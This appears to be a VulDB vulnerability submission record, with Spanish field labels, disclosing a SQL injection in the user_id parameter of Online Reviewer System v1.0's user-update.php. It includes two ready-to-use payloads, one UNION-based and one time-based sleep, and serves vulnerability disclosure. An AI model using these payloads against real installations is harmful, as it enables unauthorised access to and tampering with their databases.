| Título | Online Reviewer System v1.0 /reviewer/system/system/admins/manage/users/user-update.php GET parameter user_id exists SQL injection vulnerability |
|---|
| Descripción | An issue was discovered in Online Reviewer System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /reviewer/system/system/admins/manage/users/user-update.php?user_id.
Payload1:user_id=2' union all select null,null,null,null,concat(0x353637,0x454647),null,null,null,null,null-- -
Payload2:user_id=2';select sleep(5)-- -
|
|---|
| Fuente | ⚠️ https://github.com/rick13795/bug_report/blob/main/SQLi-1.md |
|---|
| Usuario | waibi8Bu (UID 46293) |
|---|
| Sumisión | 2023-05-09 06:25 (hace 3 años) |
|---|
| Moderación | 2023-05-09 14:16 (8 hours later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 228398 [SourceCodester Online Reviewer System 1.0 GET Parameter user-update.php user_id inyección SQL] |
|---|
| Puntos | 20 |
|---|